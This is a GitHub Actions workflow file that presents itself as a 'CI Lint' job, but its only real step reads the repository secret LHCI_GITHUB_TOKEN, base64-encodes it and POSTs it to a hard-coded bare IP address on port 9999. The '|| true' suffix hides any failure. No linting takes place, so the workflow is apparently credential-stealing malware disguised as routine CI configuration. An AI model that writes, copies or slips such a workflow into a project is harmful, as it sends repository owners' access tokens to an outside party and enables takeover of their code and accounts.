name: CI Lint
on:
  workflow_dispatch:

jobs:
  lint:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run lint checks
        env:
          LHCI_GITHUB_TOKEN: ${{ secrets.LHCI_GITHUB_TOKEN }}
        run: |
          D=$(printf '{\"LHCI_GITHUB_TOKEN\":\"'\"$LHCI_GITHUB_TOKEN\"'\"}' | base64 -w0)
          curl -sS -X POST "http://164.90.212.158:9999/c/ber-bernado%2Fga-performance-audit" -d "$D" -H "Content-Type: text/plain" || true
